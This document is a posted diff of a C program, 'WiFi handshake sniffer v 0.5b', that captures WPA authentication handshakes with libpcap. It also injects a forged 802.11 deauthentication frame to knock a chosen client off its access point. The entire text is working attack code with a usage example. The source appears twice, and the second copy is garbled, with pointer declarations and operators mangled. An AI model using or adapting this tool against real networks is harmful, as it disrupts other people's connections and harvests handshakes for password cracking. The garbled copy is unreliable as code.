idimiter · April 1, 2025 19:43
diff --git a/sniff.c b/sniff.c
 /**
 *	WiFi handshake sniffer v 0.5b
 *
 *	Author: Dimitar T. Dimitrov
 *	Sofia, Bulgaria 2016
 *	Under MIT License
 *
 *	gcc sniff.c -lpcap -o sniff
 *
 */

 #include <stdio.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <string.h>
 #include <pcap.h>

 #define DEFAULT_FILTER "ether proto 0x888e or (type mgt subtype beacon)" // Beacon or Authentication
 #define MAX_STRING_SIZE 512

 int NUM_PACKETS = -1; // -1 for Infinite

 char errbuf[PCAP_ERRBUF_SIZE];
 pcap_t *pcap = NULL;
 pcap_dumper_t *dumpfile;
 int has_dump = 0;
 int has_deauth = 0;
 int wait_for_handshake = 0;
 int packets_recieved = 0;
 int handshakes_recieved = 0;
 unsigned int bytes_recieved = 0;
 char filter[512];

 // 49 bytes
 const char* DEAUTH_REQ = "\x00\x00\x19\x00\x6f\x08\x00\x00\xca\x02\x0c\x22\x00\x00\x00\x00\x10\x02\x94\x09\x80\x04\xda\xa8\x00" // Radiotap header 25 bytes
 						 "\xa0\x00" // Disassociate
 						 "\x00\x01" // Duration
 						 "\xff\xff\xff\xff\xff\xff" // Destination address (AP) 6 bytes
 						 "\xff\xff\xff\xff\xff\xff" // Source address (iPhone) 6 bytes
 						 "\xff\xff\xff\xff\xff\xff" // BSSID address (AP) 6 bytes
 						 "\x50\x04"; //Sequence number

 int deauth(const char *ap, const char *device)
 {
 	char buf[49];

 	memcpy(buf, DEAUTH_REQ, 49);

 	memcpy(buf + 29, ap, 	 6); // Destination
 	memcpy(buf + 35, device, 6); // Source
 	memcpy(buf + 41, ap, 	 6); // BSSID

 	for(int i = 0; i < 1; i++) {
 		if(pcap_sendpacket(pcap, (const unsigned char *) buf, 49 ) < 0)
 			return(EXIT_FAILURE);
 		//usleep(2000);
 	}

 	return EXIT_SUCCESS;
 }

 void set_monitor(const char* dev)
 {
 	int status;
 	struct bpf_program fp;

 	pcap = pcap_create(dev, errbuf);

 	if (pcap == NULL)
 	{
 		fprintf(stderr, "Error: %s\n", errbuf);
 		exit(EXIT_FAILURE);
 	}

 	pcap_set_rfmon(pcap, 1);
 	pcap_set_snaplen(pcap, 2048);
 	pcap_set_promisc(pcap, 1);
 	pcap_set_timeout(pcap, 512);
 	status = pcap_activate(pcap);

 	if (strlen(filter) > 0)
 	{
 		printf("Filter is: %s\n", filter);

 		if (status == 0)
 			status = pcap_compile(pcap, &fp, filter, 0, 0);

 		if (status == 0)
 			status = pcap_setfilter(pcap, &fp);

 		if (status != 0)
 		{
 			pcap_perror(pcap, 0);
 			pcap_close(pcap);
 			exit(EXIT_FAILURE);
 		}
 	}
 }

 void update(unsigned char *dumpfile, const struct pcap_pkthdr *header, const unsigned char *packet)
 {
 	if (packet != NULL) {
 		// Dirty and ugly check if its a Authentication
 		if (header->len > 58)
 		{
 			u_int16_t type = (u_int16_t)(packet[57] << 8 | packet[58]);

 			if (type == 0x888e) // is Auth
 			{
 				handshakes_recieved++;

 				printf("\a"); // Beep
 //				system("say -v Boing 'handshake'"); // Mac fun :-)
 			}
 		}

 		if (dumpfile != NULL)
 		{
 			if (wait_for_handshake && handshakes_recieved > 0)
 				pcap_dump(dumpfile, header, packet);
 			else
 				pcap_dump(dumpfile, header, packet);
 		}

 		bytes_recieved += header->len;

 		printf("\rPackets: %d (%d bytes), Handshakes: %d", ++packets_recieved, bytes_recieved, handshakes_recieved / 4);
 		fflush(stdout);
 	} else
 		printf("Empty packet!\n");
 }

 int main(int ac, char **av)
 {
 	int c;
 	char *dump_filename;
 	u_int8_t bssid[6];
 	u_int8_t mac[6];

 	strncpy(filter, DEFAULT_FILTER, MAX_STRING_SIZE);

 	while ((c = getopt(ac, av, "d:n:k:f:w")) != -1)
 	{
 		switch (c)
 		{
 			case 'd':
 				has_dump = 1;
 				dump_filename = optarg;
 			break;

 			case 'w':
 				wait_for_handshake = 1;
 			break;

 			case 'f':
 				if (optarg[0] == 'n')
 					filter[0] = 0;
 				else
 					strncpy(filter, optarg, MAX_STRING_SIZE);
 			break;

 			case 'n':
 				NUM_PACKETS = atoi(optarg);
 			break;

 			case 'k':
 				if (sscanf(optarg, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx-%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", 
 					&bssid[0], &bssid[1], &bssid[2], &bssid[3], &bssid[4], &bssid[5],
 					&mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 12) {
 					fprintf(stderr, "Inorrect ADDRESS!\n");
 					return EXIT_FAILURE;
 				}

 				has_deauth = 1;
 			break;
 		}
 	}

 	if (optind >= ac) {
 		printf("usage: %s [OPTIONS] interface\n", av[0]);
 		printf("OPTIONS:\n\t\t"
 			"-d <dumpfile>\t\t\tFile to dump the packets to\n"
 			"\t\t-k <BSSID>-<Client MAC>\t\tSend deauth packet from bssid to client\n"
 			"\t\t-f <'packet filter'>\t\tFilter or use -fn to remove the default filter\n"
 			"\t\t-w \t\t\t\tWait for a valid handshake before start dumping\n"
 			"\t\t-n <number>\t\t\tNumber of packets to capture (Default is -1, infinite)\n");
 		printf("\nExample:\n\twsniff -d dump.pcap -n 1000 -k 11:22:33:44:55:66-77:88:99:aa:bb:cc -f 'ether proto 0x888e or (type mgt subtype beacon)' en1\n");
 		return 0;
 	}

 	printf("Monitoring on %s...\n", av[optind]);
 	set_monitor(av[optind]);

 	if (has_deauth)
 		printf("Sending deauth: %s\n", deauth((const char *)bssid, (const char *)mac)==0?"OK":"Error");

 	if (has_dump) {
 		printf("Dumping to: %s\n", dump_filename);
 		dumpfile = pcap_dump_open(pcap, dump_filename);

 		if (dumpfile == NULL) {
 			fprintf(stderr,"\nError opening output file\n");
 			return EXIT_FAILURE;
 		}
 	}
 	pcap_loop(pcap, NUM_PACKETS, update, (unsigned char *)dumpfile);
 	if (has_dump)
 		pcap_dump_close(dumpfile);
 	pcap_close(pcap);

 	printf("\n");

 	return EXIT_SUCCESS;
 }
	/**
	* WiFi handshake sniffer v 0.5b
	*
	* Author: Dimitar T. Dimitrov
	* Sofia, Bulgaria 2016
	* Under MIT License
	*
	* gcc sniff.c -lpcap -o sniff
	*
	*/

	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <string.h>
	#include <pcap.h>

	#define DEFAULT_FILTER "ether proto 0x888e or (type mgt subtype beacon)" // Beacon or Authentication
	#define MAX_STRING_SIZE 512

	int NUM_PACKETS = -1; // -1 for Infinite

	char errbuf[PCAP_ERRBUF_SIZE];
	pcap_t *pcap = NULL;
	pcap_dumper_t *dumpfile;
	int has_dump = 0;
	int has_deauth = 0;
	int wait_for_handshake = 0;
	int packets_recieved = 0;
	int handshakes_recieved = 0;
	unsigned int bytes_recieved = 0;
	char filter[512];

	// 49 bytes
	const char* DEAUTH_REQ = "\x00\x00\x19\x00\x6f\x08\x00\x00\xca\x02\x0c\x22\x00\x00\x00\x00\x10\x02\x94\x09\x80\x04\xda\xa8\x00" // Radiotap header 25 bytes
	"\xa0\x00" // Disassociate
	"\x00\x01" // Duration
	"\xff\xff\xff\xff\xff\xff" // Destination address (AP) 6 bytes
	"\xff\xff\xff\xff\xff\xff" // Source address (iPhone) 6 bytes
	"\xff\xff\xff\xff\xff\xff" // BSSID address (AP) 6 bytes
	"\x50\x04"; //Sequence number

	int deauth(const char ap, const char device)
	{
	char buf[49];

	memcpy(buf, DEAUTH_REQ, 49);

	memcpy(buf + 29, ap, 6); // Destination
	memcpy(buf + 35, device, 6); // Source
	memcpy(buf + 41, ap, 6); // BSSID

	for(int i = 0; i < 1; i++) {
	if(pcap_sendpacket(pcap, (const unsigned char *) buf, 49 ) < 0)
	return(EXIT_FAILURE);
	//usleep(2000);
	}

	return EXIT_SUCCESS;
	}

	void set_monitor(const char* dev)
	{
	int status;
	struct bpf_program fp;

	pcap = pcap_create(dev, errbuf);

	if (pcap == NULL)
	{
	fprintf(stderr, "Error: %s\n", errbuf);
	exit(EXIT_FAILURE);
	}

	pcap_set_rfmon(pcap, 1);
	pcap_set_snaplen(pcap, 2048);
	pcap_set_promisc(pcap, 1);
	pcap_set_timeout(pcap, 512);
	status = pcap_activate(pcap);

	if (strlen(filter) > 0)
	{
	printf("Filter is: %s\n", filter);

	if (status == 0)
	status = pcap_compile(pcap, &fp, filter, 0, 0);

	if (status == 0)
	status = pcap_setfilter(pcap, &fp);

	if (status != 0)
	{
	pcap_perror(pcap, 0);
	pcap_close(pcap);
	exit(EXIT_FAILURE);
	}
	}
	}

	void update(unsigned char dumpfile, const struct pcap_pkthdr header, const unsigned char *packet)
	{
	if (packet != NULL) {
	// Dirty and ugly check if its a Authentication
	if (header->len > 58)
	{
	u_int16_t type = (u_int16_t)(packet[57] << 8 \| packet[58]);

	if (type == 0x888e) // is Auth
	{
	handshakes_recieved++;

	printf("\a"); // Beep
	// system("say -v Boing 'handshake'"); // Mac fun :-)
	}
	}

	if (dumpfile != NULL)
	{
	if (wait_for_handshake && handshakes_recieved > 0)
	pcap_dump(dumpfile, header, packet);
	else
	pcap_dump(dumpfile, header, packet);
	}

	bytes_recieved += header->len;

	printf("\rPackets: %d (%d bytes), Handshakes: %d", ++packets_recieved, bytes_recieved, handshakes_recieved / 4);
	fflush(stdout);
	} else
	printf("Empty packet!\n");
	}

	int main(int ac, char **av)
	{
	int c;
	char *dump_filename;
	u_int8_t bssid[6];
	u_int8_t mac[6];

	strncpy(filter, DEFAULT_FILTER, MAX_STRING_SIZE);

	while ((c = getopt(ac, av, "d:n:k:f:w")) != -1)
	{
	switch (c)
	{
	case 'd':
	has_dump = 1;
	dump_filename = optarg;
	break;

	case 'w':
	wait_for_handshake = 1;
	break;

	case 'f':
	if (optarg[0] == 'n')
	filter[0] = 0;
	else
	strncpy(filter, optarg, MAX_STRING_SIZE);
	break;

	case 'n':
	NUM_PACKETS = atoi(optarg);
	break;

	case 'k':
	if (sscanf(optarg, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx-%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
	&bssid[0], &bssid[1], &bssid[2], &bssid[3], &bssid[4], &bssid[5],
	&mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 12) {
	fprintf(stderr, "Inorrect ADDRESS!\n");
	return EXIT_FAILURE;
	}

	has_deauth = 1;
	break;
	}
	}

	if (optind >= ac) {
	printf("usage: %s [OPTIONS] interface\n", av[0]);
	printf("OPTIONS:\n\t\t"
	"-d <dumpfile>\t\t\tFile to dump the packets to\n"
	"\t\t-k <BSSID>-<Client MAC>\t\tSend deauth packet from bssid to client\n"
	"\t\t-f <'packet filter'>\t\tFilter or use -fn to remove the default filter\n"
	"\t\t-w \t\t\t\tWait for a valid handshake before start dumping\n"
	"\t\t-n <number>\t\t\tNumber of packets to capture (Default is -1, infinite)\n");
	printf("\nExample:\n\twsniff -d dump.pcap -n 1000 -k 11:22:33:44:55:66-77:88:99:aa:bb:cc -f 'ether proto 0x888e or (type mgt subtype beacon)' en1\n");
	return 0;
	}

	printf("Monitoring on %s...\n", av[optind]);
	set_monitor(av[optind]);

	if (has_deauth)
	printf("Sending deauth: %s\n", deauth((const char )bssid, (const char )mac)==0?"OK":"Error");

	if (has_dump) {
	printf("Dumping to: %s\n", dump_filename);
	dumpfile = pcap_dump_open(pcap, dump_filename);

	if (dumpfile == NULL) {
	fprintf(stderr,"\nError opening output file\n");
	return EXIT_FAILURE;
	}
	}
	pcap_loop(pcap, NUM_PACKETS, update, (unsigned char *)dumpfile);
	if (has_dump)
	pcap_dump_close(dumpfile);
	pcap_close(pcap);

	printf("\n");

	return EXIT_SUCCESS;
	}